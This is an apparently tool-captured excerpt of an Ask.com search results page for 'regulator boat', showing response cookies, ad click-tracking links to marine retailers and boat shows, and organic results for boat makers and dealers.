Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjMxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:31 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:31 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 136555

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a001',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/CLz2oe2S26YCFcJB5godVnd72g/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CKhLRH8tBTfzqGsKDmQfW7u3TDfzbru0BzO7z-h7ErfQEEAEg-_6BAygFUOC07eYEYMmGo4fUo4AQyAEBqgQYT9AexHv24pN5jhAmk3wLQW8DM3PoSymT&num=1&sig=AGiWqtx4UAGMana8plVwlqHmVxJ-4wwyKQ&adurl=http://www.bmgevents.com/frederickburg/boatshow/index.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(66); if (typeof efclk != 'undefined') efclk(66); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_0');" class="nu" onmouseover="return ss('www.bmgevents.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CKhLRH8tBTfzqGsKDmQfW7u3TDfzbru0BzO7z-h7ErfQEEAEg-_6BAygFUOC07eYEYMmGo4fUo4AQyAEBqgQYT9AexHv24pN5jhAmk3wLQW8DM3PoSymT&num=1&sig=AGiWqtx4UAGMana8plVwlqHmVxJ-4wwyKQ&adurl=http://www.bmgevents.com/frederickburg/boatshow/index.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(66); if (typeof efclk != 'undefined') efclk(66); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_0');" class="nu" onmouseover="return ss('www.bmgevents.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CV5vCH8tBTfzqGsKDmQfW7u3TDabv3JYB7K7Zpgumw8QWEAIg-_6BAygFULHa3fEDYMmGo4fUo4AQyAEBqgQbT9BujFr24ZN5jhB_kh0MTXHZg3eAFFDv9T4Y&num=2&sig=AGiWqtzc0quvAuXxD6Koezv_rlULhohqOA&adurl=http://www.abellmarine.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(31); if (typeof efclk != 'undefined') efclk(31); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_1');" class="nu" onmouseover="return ss('www.abellmarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CV5vCH8tBTfzqGsKDmQfW7u3TDabv3JYB7K7Zpgumw8QWEAIg-_6BAygFULHa3fEDYMmGo4fUo4AQyAEBqgQbT9BujFr24ZN5jhB_kh0MTXHZg3eAFFDv9T4Y&num=2&sig=AGiWqtzc0quvAuXxD6Koezv_rlULhohqOA&adurl=http://www.abellmarine.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(31); if (typeof efclk != 'undefined') efclk(31); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_1');" class="nu" onmouseover="return ss('www.abellmarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=ClIVJH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&sig=AGiWqtxH5FI73CQ03a53xbqXPWHPoTI68Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(97); if (typeof efclk != 'undefined') efclk(97); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=ClIVJH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&sig=AGiWqtxH5FI73CQ03a53xbqXPWHPoTI68Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(97); if (typeof efclk != 'undefined') efclk(97); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=ClUl0H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtx_zC8X_8DVFJtSMxNwTUOc4JBGhA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(97); if (typeof efclk != 'undefined') efclk(97); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=ClUl0H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtx_zC8X_8DVFJtSMxNwTUOc4JBGhA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C56M8H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtxTN1LS99I2GGVfhc_lzKHTPDdkUQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(97); if (typeof efclk != 'undefined') efclk(97); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C56M8H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtxTN1LS99I2GGVfhc_lzKHTPDdkUQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CnX3zH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtyOt-AhQ1O4F9WUWeFTZ2xTbTxYzQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(97); if (typeof efclk != 'undefined') efclk(97); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CnX3zH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtyOt-AhQ1O4F9WUWeFTZ2xTbTxYzQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C3LksH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtwzb4aK-dGZKZV3LjtQ71FvL9uvug&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(97); if (typeof efclk != 'undefined') efclk(97); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C3LksH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtwzb4aK-dGZKZV3LjtQ71FvL9uvug&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CXigbH8tBTfzqGsKDmQfW7u3TDe2R_78Br7bGshWQqMEHEAQg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_QLoNL9uebeTYT_lgeer_NG1UK5HUl_RGCckh6awk&num=4&sig=AGiWqtxON8u7C2kzjCZXIJbedQwbVnqh-Q&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(74); if (typeof efclk != 'undefined') efclk(74); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_3');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CXigbH8tBTfzqGsKDmQfW7u3TDe2R_78Br7bGshWQqMEHEAQg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_QLoNL9uebeTYT_lgeer_NG1UK5HUl_RGCckh6awk&num=4&sig=AGiWqtxON8u7C2kzjCZXIJbedQwbVnqh-Q&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(74); if (typeof efclk != 'undefined') efclk(74); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_3');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/32fs.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a002',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r2_t" href="http://www.reel-time.com/forum/showthread.php?t=41911"
onmousedown="return fp(this,{en:'te',io:'0',b:'a003',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" >99 <b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.comstockyachtsales.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >New Jersey <b>
...[SNIP]...
<td>

<a id="r4_t" href="http://www.comstockyachtsales.com/aboutus.asp"
onmousedown="return fp(this,{en:'in',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >New Jersey <b>
...[SNIP]...
<td>

<a id="r5_t" href="http://grillautomotivebestbuy.co.cc/info-Camco_40053_RV_Brass_Water_Pressure_Regulator-B000BQ7WH2.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Camco 40053 RV Brass Water Pressure <b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.fishingandboats.com/boat-regulator.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Install a <b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.boatworldusa.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.yachtworld.com/boats/category/type/Regulator"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.regulatormarinegear.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CKhLRH8tBTfzqGsKDmQfW7u3TDfzbru0BzO7z-h7ErfQEEAEg-_6BAygFUOC07eYEYMmGo4fUo4AQyAEBqgQYT9AexHv24pN5jhAmk3wLQW8DM3PoSymT&num=1&sig=AGiWqtx4UAGMana8plVwlqHmVxJ-4wwyKQ&adurl=http://www.bmgevents.com/frederickburg/boatshow/index.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(12); if (typeof efclk != 'undefined') efclk(12); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_0');" class="nu" onmouseover="return ss('www.bmgevents.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CKhLRH8tBTfzqGsKDmQfW7u3TDfzbru0BzO7z-h7ErfQEEAEg-_6BAygFUOC07eYEYMmGo4fUo4AQyAEBqgQYT9AexHv24pN5jhAmk3wLQW8DM3PoSymT&num=1&sig=AGiWqtx4UAGMana8plVwlqHmVxJ-4wwyKQ&adurl=http://www.bmgevents.com/frederickburg/boatshow/index.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(12); if (typeof efclk != 'undefined') efclk(12); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_0');" class="nu" onmouseover="return ss('www.bmgevents.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CV5vCH8tBTfzqGsKDmQfW7u3TDabv3JYB7K7Zpgumw8QWEAIg-_6BAygFULHa3fEDYMmGo4fUo4AQyAEBqgQbT9BujFr24ZN5jhB_kh0MTXHZg3eAFFDv9T4Y&num=2&sig=AGiWqtzc0quvAuXxD6Koezv_rlULhohqOA&adurl=http://www.abellmarine.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(89); if (typeof efclk != 'undefined') efclk(89); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_1');" class="nu" onmouseover="return ss('www.abellmarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CV5vCH8tBTfzqGsKDmQfW7u3TDabv3JYB7K7Zpgumw8QWEAIg-_6BAygFULHa3fEDYMmGo4fUo4AQyAEBqgQbT9BujFr24ZN5jhB_kh0MTXHZg3eAFFDv9T4Y&num=2&sig=AGiWqtzc0quvAuXxD6Koezv_rlULhohqOA&adurl=http://www.abellmarine.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(89); if (typeof efclk != 'undefined') efclk(89); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_1');" class="nu" onmouseover="return ss('www.abellmarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=ClIVJH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&sig=AGiWqtxH5FI73CQ03a53xbqXPWHPoTI68Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(8); if (typeof efclk != 'undefined') efclk(8); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=ClIVJH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&sig=AGiWqtxH5FI73CQ03a53xbqXPWHPoTI68Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(8); if (typeof efclk != 'undefined') efclk(8); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=ClUl0H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtx_zC8X_8DVFJtSMxNwTUOc4JBGhA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(8); if (typeof efclk != 'undefined') efclk(8); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=ClUl0H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Qbpd09uCbeX4TYCaM1JcSZ1IG-q-V-XndCzQ&num=3&ctype=4&sig=AGiWqtx_zC8X_8DVFJtSMxNwTUOc4JBGhA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C56M8H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtxTN1LS99I2GGVfhc_lzKHTPDdkUQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(8); if (typeof efclk != 'undefined') efclk(8); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C56M8H8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtxTN1LS99I2GGVfhc_lzKHTPDdkUQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CnX3zH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtyOt-AhQ1O4F9WUWeFTZ2xTbTxYzQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(8); if (typeof efclk != 'undefined') efclk(8); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D39eeve-yzG%26sgch%3D35d3Rp7Y0'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CnX3zH8tBTfzqGsKDmQfW7u3TDdvO8tsBk7izyxfr17kIEAMg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Bul3T24Jt5fhNgJozUlxJnUgb6r5X5ed0LNA&num=3&ctype=4&sig=AGiWqtyOt-AhQ1O4F9WUWeFTZ2xTbTxYzQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
